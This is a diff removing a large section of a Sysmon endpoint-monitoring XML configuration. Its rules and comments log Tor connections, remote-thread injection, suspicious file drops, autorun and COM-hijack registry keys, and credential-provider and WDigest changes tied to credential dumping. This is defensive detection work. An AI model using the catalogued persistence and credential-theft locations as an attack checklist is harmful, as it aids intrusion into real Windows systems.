-			<DestinationPort name="Tor" condition="is">9001</DestinationPort> <!--Tor protocol [ http://www.computerworlduk.com/tutorial/security/tor-enterprise-2016-blocking-malware-darknet-use-rogue-nodes-3633907/ ] -->
-			<DestinationPort name="Tor" condition="is">9030</DestinationPort> <!--Tor protocol [ http://www.computerworlduk.com/tutorial/security/tor-enterprise-2016-blocking-malware-darknet-use-rogue-nodes-3633907/ ] -->
-		</NetworkConnect>
-	</RuleGroup>
-
-	<RuleGroup name="" groupRelation="or">
-		<NetworkConnect onmatch="exclude">
-			<!--SECTION: Microsoft-->
-			<Image condition="begin with">C:\ProgramData\Microsoft\Windows Defender\Platform\</Image>
-			<Image condition="end with">AppData\Local\Microsoft\Teams\current\Teams.exe</Image> <!--Microsoft: Teams-->
-			<DestinationHostname condition="end with">.microsoft.com</DestinationHostname> <!--Microsoft:Update delivery-->
-			<DestinationHostname condition="end with">microsoft.com.akadns.net</DestinationHostname> <!--Microsoft:Update delivery-->
-			<DestinationHostname condition="end with">microsoft.com.nsatc.net</DestinationHostname> <!--Microsoft:Update delivery-->
-			<!--Section: Loopback Addresses-->
-			<DestinationIp condition="is">127.0.0.1</DestinationIp> <!--Credit @ITProPaul-->
-			<DestinationIp condition="begin with">fe80:0:0:0</DestinationIp> <!--Credit @ITProPaul-->
-		</NetworkConnect>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 4 : RESERVED FOR SYSMON SERVICE STATUS MESSAGES-->
-
-		<!--DATA: UtcTime, State, Version, SchemaVersion-->
-		<!--Cannot be filtered.-->
-
-	<!--SYSMON EVENT ID 5 : PROCESS ENDED [ProcessTerminate]-->
-		<!--COMMENT:	Useful data in building infection timelines.-->
-
-		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image-->
-	<RuleGroup name="" groupRelation="or">
-		<ProcessTerminate onmatch="include">
-			<Image condition="begin with">C:\Users</Image> <!--Process terminations by user binaries-->
-			<Image condition="begin with">\</Image> <!--Devices and VSC shouldn't be executing changes | Credit: @SBousseaden @ionstorm @neu5ron @PerchedSystems [ https://twitter.com/SwiftOnSecurity/status/1133167323991486464 ] -->
-		</ProcessTerminate>
-	</RuleGroup>
-
-	<RuleGroup name="" groupRelation="or">
-		<ProcessTerminate onmatch="exclude">
-		</ProcessTerminate>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 6 : DRIVER LOADED INTO KERNEL [DriverLoad]-->
-		<!--COMMENT:	Because drivers with bugs can be used to escalate to kernel permissions, be extremely selective
-			about what you exclude from monitoring. Low event volume, little incentive to exclude.
-			[ https://attack.mitre.org/wiki/Technique/T1014 ] -->
-		<!--TECHNICAL:	Sysmon will check the signing certificate revocation status of any driver you don't exclude.-->
-
-		<!--DATA: UtcTime, ImageLoaded, Hashes, Signed, Signature, SignatureStatus-->
-	<RuleGroup name="" groupRelation="or">
-		<DriverLoad onmatch="exclude">
-			<Signature condition="contains">microsoft</Signature> <!--Exclude signed Microsoft drivers-->
-			<Signature condition="contains">windows</Signature> <!--Exclude signed Microsoft drivers-->
-			<Signature condition="begin with">Intel </Signature> <!--Exclude signed Intel drivers-->
-		</DriverLoad>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 7 : DLL (IMAGE) LOADED BY PROCESS [ImageLoad]-->
-		<!--COMMENT:	Can cause high system load, disabled by default.-->
-		<!--COMMENT:	[ https://attack.mitre.org/wiki/Technique/T1073 ] [ https://attack.mitre.org/wiki/Technique/T1038 ] [ https://attack.mitre.org/wiki/Technique/T1034 ] -->
-
-		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, Hashes, Signed, Signature, SignatureStatus-->
-	<RuleGroup name="" groupRelation="or">
-		<ImageLoad onmatch="include">
-			<!--NOTE: Using "include" with no rules means nothing in this section will be logged-->
-		</ImageLoad>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 8 : REMOTE THREAD CREATED [CreateRemoteThread]-->
-		<!--COMMENT:	Monitor for processes injecting code into other processes. Often used by malware to cloak their actions. Also when Firefox loads Flash.
-		[ https://attack.mitre.org/wiki/Technique/T1055 ] -->
-
-		<!--DATA: UtcTime, SourceProcessGuid, SourceProcessId, SourceImage, TargetProcessId, TargetImage, NewThreadId, StartAddress, StartModule, StartFunction-->
-	<RuleGroup name="" groupRelation="or">
-		<CreateRemoteThread onmatch="exclude">
-			<!--COMMENT: Exclude mostly-safe sources and log anything else.-->
-			<SourceImage condition="is">C:\Windows\system32\wbem\WmiPrvSE.exe</SourceImage>
-			<SourceImage condition="is">C:\Windows\system32\svchost.exe</SourceImage>
-			<SourceImage condition="is">C:\Windows\system32\wininit.exe</SourceImage>
-			<SourceImage condition="is">C:\Windows\system32\csrss.exe</SourceImage>
-			<SourceImage condition="is">C:\Windows\system32\services.exe</SourceImage>
-			<SourceImage condition="is">C:\Windows\system32\winlogon.exe</SourceImage>
-			<SourceImage condition="is">C:\Windows\system32\audiodg.exe</SourceImage>
-			<StartModule condition="is">C:\Windows\system32\kernel32.dll</StartModule>
-			<TargetImage condition="is">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</TargetImage>
-		</CreateRemoteThread>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 9 : RAW DISK ACCESS [RawAccessRead]-->
-		<!--EVENT 9: "RawAccessRead detected"-->
-		<!--COMMENT:	Can cause high system load, disabled by default.-->
-		<!--COMMENT:	Monitor for raw sector-level access to the disk, often used to bypass access control lists or access locked files.
-			Disabled by default since including even one entry here activates this component. Reward/performance/rule maintenance decision.
-			Encourage you to experiment with this feature yourself. [ https://attack.mitre.org/wiki/Technique/T1067 ] -->
-		<!--COMMENT:	You will likely want to set this to a full capture on domain controllers, where no process should be doing raw reads.-->
-
-		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, Device-->
-	<RuleGroup name="" groupRelation="or">
-		<RawAccessRead onmatch="include">
-			<!--NOTE: Using "include" with no rules means nothing in this section will be logged-->
-		</RawAccessRead>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 10 : INTER-PROCESS ACCESS [ProcessAccess]-->
-		<!--EVENT 10: "Process accessed"-->
-		<!--COMMENT:	Can cause high system load, disabled by default.-->
-		<!--COMMENT:	Monitor for processes accessing other process' memory.-->
-
-		<!--DATA: UtcTime, SourceProcessGuid, SourceProcessId, SourceThreadId, SourceImage, TargetProcessGuid, TargetProcessId, TargetImage, GrantedAccess, CallTrace-->
-	<RuleGroup name="" groupRelation="or">
-		<ProcessAccess onmatch="include">
-			<!--NOTE: Using "include" with no rules means nothing in this section will be logged-->
-		</ProcessAccess>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 11 : FILE CREATED [FileCreate]-->
-		<!--EVENT 11: "File created"-->
-		<!--NOTE:	Other filesystem "minifilters" can make it appear to Sysmon that some files are being written twice. This is not a Sysmon issue, per Mark Russinovich.-->
-		<!--NOTE:	You may not see files detected by antivirus. Other filesystem minifilters, like antivirus, can act before Sysmon receives the alert a file was written.-->
-
-		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, TargetFilename, CreationUtcTime-->
-	<RuleGroup name="" groupRelation="or">
-		<FileCreate onmatch="include">
-			<TargetFilename name="T1023" condition="contains">\Start Menu</TargetFilename> <!--Windows: Startup links and shortcut modification [ https://attack.mitre.org/wiki/Technique/T1023 ] -->
-			<TargetFilename name="T1165" condition="contains">\Startup\</TargetFilename> <!--Microsoft:Changes to user's auto-launched files and shortcuts-->
-			<TargetFilename name="OutlookAttachment" condition="contains">\Content.Outlook\</TargetFilename> <!--Microsoft:Outlook: attachments-->
-			<TargetFilename name="Downloads" condition="contains">\Downloads\</TargetFilename> <!--Downloaded files. Does not include "Run" files in IE-->
-			<TargetFilename condition="end with">.application</TargetFilename> <!--Microsoft:ClickOnce: [ https://blog.netspi.com/all-you-need-is-one-a-clickonce-love-story/ ] -->
-			<TargetFilename condition="end with">.appref-ms</TargetFilename> <!--Microsoft:ClickOnce application | Credit @ion-storm -->
-			<TargetFilename condition="end with">.bat</TargetFilename> <!--Batch scripting-->
-			<TargetFilename condition="end with">.chm</TargetFilename>
-			<TargetFilename condition="end with">.cmd</TargetFilename> <!--Batch scripting: Batch scripts can also use the .cmd extension | Credit: @mmazanec -->
-			<TargetFilename condition="end with">.cmdline</TargetFilename> <!--Microsoft:dotNet: Executed by cvtres.exe-->
-			<TargetFilename name="T1176" condition="end with">.crx</TargetFilename> <!--Chrome extension-->
-			<TargetFilename condition="end with">.dmp</TargetFilename> <!--Process dumps [ (fr) http://blog.gentilkiwi.com/securite/mimikatz/minidump ] -->
-			<TargetFilename condition="end with">.docm</TargetFilename> <!--Microsoft:Office:Word: Macro-->
-			<TargetFilename name="DLL" condition="end with">.dll</TargetFilename> <!--Microsoft:Office:Word: Macro-->
-			<TargetFilename name="EXE" condition="end with">.exe</TargetFilename> <!--Executable-->
-			<TargetFilename name="ProcessHostingdotNETCode" condition="end with">.exe.log</TargetFilename> <!-- [ https://github.com/bitsadmin/nopowershell ] | Credit: @SBousseaden [ https://twitter.com/SBousseaden/status/1137493597769687040 ]  -->
-			<TargetFilename condition="end with">.jar</TargetFilename> <!--Java applets-->
-			<TargetFilename condition="end with">.jnlp</TargetFilename> <!--Java applets-->
-			<TargetFilename condition="end with">.jse</TargetFilename> <!--Scripting [ Example: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Mal~Phires-C/detailed-analysis.aspx ] -->
-			<TargetFilename condition="end with">.hta</TargetFilename> <!--Scripting-->
-			<TargetFilename condition="end with">.job</TargetFilename> <!--Scheduled task-->
-			<TargetFilename condition="end with">.pptm</TargetFilename> <!--Microsoft:Office:Word: Macro-->
-			<TargetFilename condition="end with">.ps1</TargetFilename> <!--PowerShell [ More information: http://www.hexacorn.com/blog/2014/08/27/beyond-good-ol-run-key-part-16/ ] -->
-			<TargetFilename condition="end with">.sys</TargetFilename> <!--System driver files-->
-			<TargetFilename condition="end with">.scr</TargetFilename> <!--System driver files-->
-			<TargetFilename condition="end with">.vbe</TargetFilename> <!--VisualBasicScripting-->
-			<TargetFilename condition="end with">.vbs</TargetFilename> <!--VisualBasicScripting-->
-			<TargetFilename condition="end with">.xlsm</TargetFilename> <!--Microsoft:Office:Word: Macro-->
-			<TargetFilename condition="end with">proj</TargetFilename><!--Microsoft:MSBuild:Script: More information: https://twitter.com/subTee/status/885919612969394177-->
-			<TargetFilename condition="end with">.sln</TargetFilename><!--Microsoft:MSBuild:Script: More information: https://twitter.com/subTee/status/885919612969394177-->
-			<TargetFilename name="DefaultUserModified" condition="begin with">C:\Users\Default</TargetFilename> <!--Windows: Changes to default user profile-->
-			<TargetFilename condition="begin with">C:\Windows\system32\Drivers</TargetFilename> <!--Microsoft: Drivers dropped here-->
-			<TargetFilename condition="begin with">C:\Windows\SysWOW64\Drivers</TargetFilename> <!--Microsoft: Drivers dropped here-->
-			<TargetFilename name="T1037,T1484" condition="begin with">C:\Windows\system32\GroupPolicy\Machine\Scripts</TargetFilename> <!--Group policy [ More information: http://www.hexacorn.com/blog/2017/01/07/beyond-good-ol-run-key-part-52/ ] -->
-			<TargetFilename name="T1037,T1484" condition="begin with">C:\Windows\system32\GroupPolicy\User\Scripts</TargetFilename> <!--Group policy [ More information: http://www.hexacorn.com/blog/2017/01/07/beyond-good-ol-run-key-part-52/ ] -->
-			<TargetFilename condition="begin with">C:\Windows\system32\Wbem</TargetFilename> <!--Microsoft:WMI: [ More information: http://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf ] -->
-			<TargetFilename condition="begin with">C:\Windows\SysWOW64\Wbem</TargetFilename> <!--Microsoft:WMI: [ More information: http://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf ] -->
-			<TargetFilename condition="begin with">C:\Windows\system32\WindowsPowerShell</TargetFilename> <!--Microsoft:Powershell: Look for modifications for persistence [ https://www.malwarearchaeology.com/cheat-sheets ] -->
-			<TargetFilename condition="begin with">C:\Windows\SysWOW64\WindowsPowerShell</TargetFilename> <!--Microsoft:Powershell: Look for modifications for persistence [ https://www.malwarearchaeology.com/cheat-sheets ] -->
-			<TargetFilename name="T1053" condition="begin with">C:\Windows\Tasks\</TargetFilename> <!--Microsoft:ScheduledTasks [ https://attack.mitre.org/wiki/Technique/T1053 ] -->
-			<TargetFilename name="T1053" condition="begin with">C:\Windows\system32\Tasks</TargetFilename> <!--Microsoft:ScheduledTasks [ https://attack.mitre.org/wiki/Technique/T1053 ] -->
-			<TargetFilename name="T1053" condition="begin with">C:\Windows\SysWOW64\Tasks</TargetFilename> <!--Microsoft:ScheduledTasks [ https://attack.mitre.org/wiki/Technique/T1053 ] -->
-			<Image condition="begin with">\Device\HarddiskVolumeShadowCopy</Image> <!--Nothing should be executing from VSC | Credit: @SBousseaden [ https://twitter.com/SBousseaden/status/1133030955407630336 ] -->
-			<!--Windows application compatibility-->
-			<TargetFilename condition="begin with">C:\Windows\AppPatch\Custom</TargetFilename> <!--Windows: Application compatibility shims [ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html ] -->
-			<TargetFilename condition="contains">VirtualStore</TargetFilename> <!--Windows: UAC virtualization [ https://blogs.msdn.microsoft.com/oldnewthing/20150902-00/?p=91681 ] -->
-			<!--Exploitable file names-->
-			<TargetFilename condition="end with">.xls</TargetFilename> <!--Legacy Office files are often used for attacks-->
-			<TargetFilename condition="end with">.ppt</TargetFilename> <!--Legacy Office files are often used for attacks-->
-			<TargetFilename condition="end with">.rtf</TargetFilename> <!--RTF files often 0day malware vectors when opened by Office-->
-		</FileCreate>
-	</RuleGroup>
-
-	<RuleGroup name="" groupRelation="or">
-		<FileCreate onmatch="exclude">
-			<!--SECTION: Microsoft-->
-			<Image condition="is">C:\Program Files (x86)\EMET 5.5\EMET_Service.exe</Image> <!--Microsoft:EMET: Writes to C:\Windows\AppPatch\-->
-			<!--SECTION: Microsoft:Office:Click2Run-->
-			<Image condition="is">C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe</Image> <!-- Microsoft:Office Click2Run-->
-			<!--SECTION: Windows-->
-			<Image condition="is">C:\Windows\system32\smss.exe</Image> <!-- Windows: Session Manager SubSystem: Creates swapfile.sys,pagefile.sys,hiberfile.sys-->
-			<Image condition="is">C:\Windows\system32\CompatTelRunner.exe</Image> <!-- Windows: Windows 10 app, creates tons of cache files-->
-			<Image condition="is">\\?\C:\Windows\system32\wbem\WMIADAP.EXE</Image> <!-- Windows: WMI Performance updates-->
-			<Image condition="is">C:\Windows\system32\mobsync.exe</Image> <!--Windows: Network file syncing-->
-			<TargetFilename condition="begin with">C:\Windows\system32\DriverStore\Temp\</TargetFilename> <!-- Windows: Temp files by DrvInst.exe-->
-			<TargetFilename condition="begin with">C:\Windows\system32\wbem\Performance\</TargetFilename> <!-- Windows: Created in wbem by WMIADAP.exe-->
-			<TargetFilename condition="begin with">C:\Windows\Installer\</TargetFilename> <!--Windows:Installer: Ignore MSI installer files caching-->
-			<!--SECTION: Windows:Updates-->
-			<TargetFilename condition="begin with">C:\$WINDOWS.~BT\Sources\</TargetFilename> <!-- Windows: Feature updates containing lots of .exe and .sys-->
-			<Image condition="begin with">C:\Windows\winsxs\amd64_microsoft-windows</Image> <!-- Windows: Windows update-->
-		</FileCreate>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 12 & 13 & 14 : REGISTRY MODIFICATION [RegistryEvent]-->
-		<!--EVENT 12: "Registry object added or deleted"-->
-		<!--EVENT 13: "Registry value set"-->
-		<!--EVENT 14: "Registry objected renamed"-->
-
-		<!--NOTE:	Windows writes hundreds or thousands of registry keys a minute, so just because you're not changing things, doesn't mean these rules aren't being run.-->
-		<!--NOTE:	You do not have to spend a lot of time worrying about performance, CPUs are fast, but it's something to consider. Every rule and condition type has a small cost.-->
-		<!--NOTE:	"contains" works by finding the first letter, then matching the second, etc, so the first letters should be as low-occurrence as possible.-->
-		<!--NOTE:	[ https://attack.mitre.org/wiki/Technique/T1112 ] -->
-
-		<!--TECHNICAL:	You cannot filter on the "Details" attribute, due to performance issues when very large keys are written, and variety of data formats-->
-		<!--TECHNICAL:	Possible prefixes are HKLM, HKCR, and HKU-->
-		<!--CRITICAL:	Schema version 3.30 and higher change HKLM\="\REGISTRY\MACHINE\" and HKU\="\REGISTRY\USER\" and HKCR\="\REGISTRY\MACHINE\SOFTWARE\Classes\" and CurrentControlSet="ControlSet001"-->
-		<!--CRITICAL:	Due to a bug, Sysmon versions BEFORE 7.01 may not properly log with the new prefix style for registry keys that was originally introduced in schema version 3.30-->
-		<!--NOTE:	Because Sysmon runs as a service, it has no filtering ability for, or concept of, HKCU or HKEY_CURRENT_USER. Use "contains" or "end with" to get around this limitation-->
-
-		<!-- ! CRITICAL NOTE !:	It may appear this section is MISSING important entries, but SOME RULES MONITOR MANY KEYS, so look VERY CAREFULLY to see if something is already covered.
-								Sysmon's wildcard monitoring along with highly-tuned generic strings cuts the rulesets down immensely, compared to doing this in other tools.
-								For example, most COM hijacking in CLSID's across the registry is covered by a single rule monitoring a InProcServer32 wildcard-->
-
-		<!--DATA: EventType, UtcTime, ProcessGuid, ProcessId, Image, TargetObject, Details (can't filter on), NewName (can't filter on)-->
-	<RuleGroup name="" groupRelation="or">
-		<RegistryEvent onmatch="include">
-			<!--Autorun or Startups-->
-				<!--ADDITIONAL REFERENCE: [ http://www.ghacks.net/2016/06/04/windows-automatic-startup-locations/ ] -->
-				<!--ADDITIONAL REFERENCE: [ https://view.officeapps.live.com/op/view.aspx?src=https://arsenalrecon.com/downloads/resources/Registry_Keys_Related_to_Autorun.ods ] -->
-				<!--ADDITIONAL REFERENCE: [ http://www.silentrunners.org/launchpoints.html ] -->
-				<!--ADDITIONAL REFERENCE: [ https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2 ] -->
-				<!--ADDITIONAL REFERENCE: [ https://web.archive.org/web/20200116001643/http://scholarworks.rit.edu/cgi/viewcontent.cgi?article=1533&context=theses | Understanding malware autostart techniques - Matthew Gottlieb ] -->
-			<TargetObject name="T1060,RunKey" condition="contains">CurrentVersion\Run</TargetObject> <!--Windows: Wildcard for Run keys, including RunOnce, RunOnceEx, RunServices, RunServicesOnce [Also covers terminal server] -->
-			<TargetObject name="T1060,RunPolicy" condition="contains">Policies\Explorer\Run</TargetObject> <!--Windows: Alternate runs keys | Credit @ion-storm-->
-			<TargetObject name="T1484" condition="contains">Group Policy\Scripts</TargetObject> <!--Windows: Group policy scripts-->
-			<TargetObject name="T1484" condition="contains">Windows\System\Scripts</TargetObject> <!--Windows: Wildcard for Logon, Loggoff, Shutdown-->
-			<TargetObject name="T1060" condition="contains">CurrentVersion\Windows\Load</TargetObject> <!--Windows: [ https://msdn.microsoft.com/en-us/library/jj874148.aspx ] -->
-			<TargetObject name="T1060" condition="contains">CurrentVersion\Windows\Run</TargetObject> <!--Windows: [ https://msdn.microsoft.com/en-us/library/jj874148.aspx ] -->
-			<TargetObject name="T1060" condition="contains">CurrentVersion\Winlogon\Shell</TargetObject> <!--Windows: [ https://msdn.microsoft.com/en-us/library/ms838576(v=winembedded.5).aspx ] -->
-			<TargetObject name="T1060" condition="contains">CurrentVersion\Winlogon\System</TargetObject> <!--Windows [ https://www.exterminate-it.com/malpedia/regvals/zlob-dns-changer/118 ] -->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify</TargetObject> <!--Windows: Autorun location [ https://attack.mitre.org/wiki/Technique/T1004 ] [ https://www.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order ] -->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</TargetObject> <!--Windows: [ https://technet.microsoft.com/en-us/library/ee851671.aspx ] -->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</TargetObject> <!--Windows: Autorun location [ https://www.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order ] -->
-			<TargetObject condition="begin with">HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32</TargetObject> <!--Windows: Legacy driver loading | Credit @ion-storm -->
-			<TargetObject condition="begin with">HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute</TargetObject> <!--Windows: Autorun | Credit @ion-storm | [ https://www.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order ] -->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug</TargetObject> <!--Windows: Automatic program crash debug program [ https://www.symantec.com/security_response/writeup.jsp?docid=2007-050712-5453-99&tabid=2 ] -->
-			<TargetObject condition="contains">UserInitMprLogonScript</TargetObject> <!--Windows: Legacy logon script environment variable [ http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ ] -->
-			<TargetObject name="T1112,ChangeStartupFolderPath" condition="end with">user shell folders\startup</TargetObject> <!--Monitor changes to Startup folder location for monitoring evasion | Credit @SBousseaden-->
-			<!--Services-->
-			<TargetObject name="T1031,T1050" condition="end with">\ServiceDll</TargetObject> <!--Windows: Points to a service's DLL [ https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services ] -->
-			<TargetObject name="T1031,T1050" condition="end with">\ServiceManifest</TargetObject> <!--Windows: Manifest pointing to service's DLL [ https://www.geoffchappell.com/studies/windows/win32/services/svchost/index.htm ] -->
-			<TargetObject name="T1031,T1050" condition="end with">\ImagePath</TargetObject> <!--Windows: Points to a service's EXE [ https://attack.mitre.org/wiki/Technique/T1050 ] -->
-			<TargetObject name="T1031,T1050" condition="end with">\Start</TargetObject> <!--Windows: Services start mode changes (Disabled, Automatically, Manual)-->
-			<!--RDP-->
-			<TargetObject name="RDP port change" condition="end with">Control\Terminal Server\WinStations\RDP-Tcp\PortNumber</TargetObject> <!--Windows: RDP port change under Control [ https://blog.menasec.net/2019/02/of-rdp-hijacking-part1-remote-desktop.html ]-->
-			<TargetObject name="RDP port change" condition="end with">Control\Terminal Server\fSingleSessionPerUser</TargetObject> <!--Windows: Allow same user to have mutliple RDP sessions, to hide from admin being impersonated-->
-			<TargetObject name="ModifyRemoteDesktopState" condition="end with">fDenyTSConnections</TargetObject> <!--Windows: Attacker turning on RDP-->
-			<TargetObject condition="end with">LastLoggedOnUser</TargetObject> <!--Windows: Changing last-logged in user-->
-			<TargetObject name="ModifyRemoteDesktopPort" condition="end with">RDP-tcp\PortNumber</TargetObject> <!--Windows: Changing RDP port to evade IDS-->
-			<TargetObject condition="end with">Services\PortProxy\v4tov4</TargetObject> <!--Windows: Changing RDP port to evade IDS-->
-			<!--CLSID launch commands and Default File Association changes-->
-			<TargetObject name="T1042" condition="contains">\command\</TargetObject> <!--Windows: Sensitive sub-key under file associations and CLSID that map to launch command-->
-			<TargetObject name="T1122" condition="contains">\ddeexec\</TargetObject> <!--Windows: Sensitive sub-key under file associations and CLSID that map to launch command-->
-			<TargetObject name="T1122" condition="contains">{86C86720-42A0-1069-A2E8-08002B30309D}</TargetObject> <!--Windows: Tooltip handler-->
-			<TargetObject name="T1042" condition="contains">exefile</TargetObject> <!--Windows Executable handler, to log any changes not already monitored-->
-			<!--Windows COM-->
-			<TargetObject name="T1122" condition="end with">\InprocServer32\(Default)</TargetObject> <!--Windows:COM Object Hijacking [ https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence ] | Credit @ion-storm -->
-			<!--Windows shell visual modifications used by malware-->
-			<TargetObject name="T1158" condition="end with">\Hidden</TargetObject> <!--Windows:Explorer: Some types of malware try to hide their hidden system files from the user, good signal event -->
-			<TargetObject name="T1158" condition="end with">\ShowSuperHidden</TargetObject> <!--Windows:Explorer: Some types of malware try to hide their hidden system files from the user, good signal event [ Example: https://www.symantec.com/security_response/writeup.jsp?docid=2007-061811-4341-99&tabid=2 ] -->
-			<TargetObject name="T1158" condition="end with">\HideFileExt</TargetObject> <!--Windows:Explorer: Some malware hides file extensions to make diagnosis/disinfection more daunting to novice users -->
-			<!--Windows shell hijack and modifications-->
-			<TargetObject condition="contains">Classes\*\</TargetObject> <!--Windows:Explorer: [ http://www.silentrunners.org/launchpoints.html ] -->
-			<TargetObject condition="contains">Classes\AllFilesystemObjects\</TargetObject> <!--Windows:Explorer: [ http://www.silentrunners.org/launchpoints.html ] -->
-			<TargetObject condition="contains">Classes\Directory\</TargetObject> <!--Windows:Explorer: [ https://stackoverflow.com/questions/1323663/windows-shell-context-menu-option ] -->
-			<TargetObject condition="contains">Classes\Drive\</TargetObject> <!--Windows:Explorer: [ https://stackoverflow.com/questions/1323663/windows-shell-context-menu-option ] -->
-			<TargetObject condition="contains">Classes\Folder\</TargetObject> <!--Windows:Explorer: ContextMenuHandlers, DragDropHandlers, CopyHookHandlers, [ https://stackoverflow.com/questions/1323663/windows-shell-context-menu-option ] -->
-			<TargetObject condition="contains">Classes\PROTOCOLS\</TargetObject> <!--Windows:Explorer: Protocol handlers-->
-			<TargetObject condition="contains">ContextMenuHandlers\</TargetObject> <!--Windows: [ http://oalabs.openanalysis.net/2015/06/04/malware-persistence-hkey_current_user-shell-extension-handlers/ ] -->
-			<TargetObject condition="contains">CurrentVersion\Shell</TargetObject> <!--Windows: Shell Folders, ShellExecuteHooks, ShellIconOverloadIdentifers, ShellServiceObjects, ShellServiceObjectDelayLoad [ http://oalabs.openanalysis.net/2015/06/04/malware-persistence-hkey_current_user-shell-extension-handlers/ ] -->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks</TargetObject> <!--Windows: ShellExecuteHooks-->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjectDelayLoad</TargetObject> <!--Windows: ShellExecuteHooks-->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellIconOverlayIdentifiers</TargetObject> <!--Windows: ShellExecuteHooks-->
-			<!--AppPaths hijacking-->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\</TargetObject> <!--Windows: Credit to @Hexacorn [ http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ ] -->
-			<!--Terminal service boobytrap-->
-			<TargetObject condition="begin with">HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram</TargetObject> <!--Windows:RDP: Note other Terminal Server run keys are handled by another wildcard already-->
-			<!--Group Policy integrity-->
-			<TargetObject name="T1484" condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\</TargetObject> <!--Windows: Group Policy internally uses a plug-in architecture that nothing should be modifying-->
-			<!--Winsock and Winsock2-->
-			<TargetObject condition="begin with">HKLM\SYSTEM\CurrentControlSet\Services\WinSock</TargetObject> <!--Windows: Wildcard, includes Winsock and Winsock2-->
-			<TargetObject condition="end with">\ProxyServer</TargetObject> <!--Windows: System and user proxy server-->
-			<!--Credential providers-->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider</TargetObject> <!--Wildcard, includes Credential Providers and Credential Provider Filters-->
-			<TargetObject name="T1101" condition="begin with">HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</TargetObject> <!-- [ https://attack.mitre.org/wiki/Technique/T1131 ] [ https://attack.mitre.org/wiki/Technique/T1101 ] -->
-			<TargetObject condition="begin with">HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders</TargetObject> <!--Windows: Changes to WDigest-UseLogonCredential for password scraping [ https://www.trustedsec.com/april-2015/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/ ] -->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Netsh</TargetObject> <!--Windows: Netsh helper DLL [ https://attack.mitre.org/wiki/Technique/T1128 ] -->
-			<!--Networking-->
-			<TargetObject condition="begin with">HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\</TargetObject> <!--Windows: Order of network providers that are checked to connect to destination [ https://www.malwarearchaeology.com/cheat-sheets ] -->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles</TargetObject> <!--Windows: | Credit @ion-storm -->
-			<TargetObject name="T1089" condition="end with">\EnableFirewall</TargetObject> <!--Windows: Monitor for firewall disablement, all firewall profiles [ https://attack.mitre.org/wiki/Technique/T1089 ] -->
-			<TargetObject name="T1089" condition="end with">\DoNotAllowExceptions</TargetObject> <!--Windows: Monitor for firewall disablement, all firewall profiles [ https://attack.mitre.org/wiki/Technique/T1089 ] -->
-			<TargetObject condition="begin with">HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List</TargetObject> <!--Windows Firewall authorized applications for all networks| Credit @ion-storm -->
-			<TargetObject condition="begin with">HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List</TargetObject> <!--Windows Firewall authorized applications for domain networks -->
-			<!--DLLs that get injected into every process at launch-->
-			<TargetObject name="T1103" condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls\</TargetObject> <!--Windows: Feature disabled by default [ https://attack.mitre.org/wiki/Technique/T1103 ] -->
